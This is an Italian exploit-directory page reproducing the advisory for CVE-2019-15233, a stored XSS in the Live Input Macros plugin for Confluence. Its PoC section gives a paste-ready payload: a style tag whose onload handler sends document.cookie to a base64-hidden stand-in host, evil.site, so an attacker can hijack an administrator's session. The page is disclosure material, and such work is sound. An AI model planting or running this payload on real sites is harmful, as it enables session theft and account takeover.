Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-15233 — Exploit proof-of-concept per CVE-2019-15233: vulnerabilità di Cross-Site Scripting (XSS) in Live Input Macros per Confluence, che consente il dirottamento della sessione tramite input dannoso. | Kitploit
Strumenti/GitHubGitHub/l0nax/cve-2019-15233
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubl0nax/cve-2019-15233

CVE-2019-15233

Exploit proof-of-concept per CVE-2019-15233: vulnerabilità di Cross-Site Scripting (XSS) in Live Input Macros per Confluence, che consente il dirottamento della sessione tramite input dannoso.

Vedi Repository
16 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-15233

(FAB-2019-00157) Vulnerabilità scoperta da me CVE-2019-15233

Avviso: advisory

Informazioni di Base

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

Crediti

Questa vulnerabilità di sicurezza è stata scoperta da Francesco Emanuel Bennici [email protected] di FABMation GmbH.

Descrizione

Live Input Macros offre agli Utenti la possibilità di aggiungere caselle di controllo, pulsanti di opzione, elenchi a discesa e altro ancora alle pagine di Confluence e apportare modifiche senza dover modificare la pagina.

Un attaccante può eseguire codice JavaScript sul sito Confluence se un utente aggiunge il codice dannoso.

Questo può essere utilizzato per rubare il cookie di sessione di un (es.) amministratore (hijacking della sessione).

PoC/ Exploit

Copia questo contenuto:

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

E crea un nuovo Elemento su una pagina di Confluence. Incolla questo testo al suo interno e condividi la pagina di Confluence con (es.) un amministratore di sistema e se accede al sito, puoi dirottare/ "copiare" la sua sessione.

Scarica lo strumento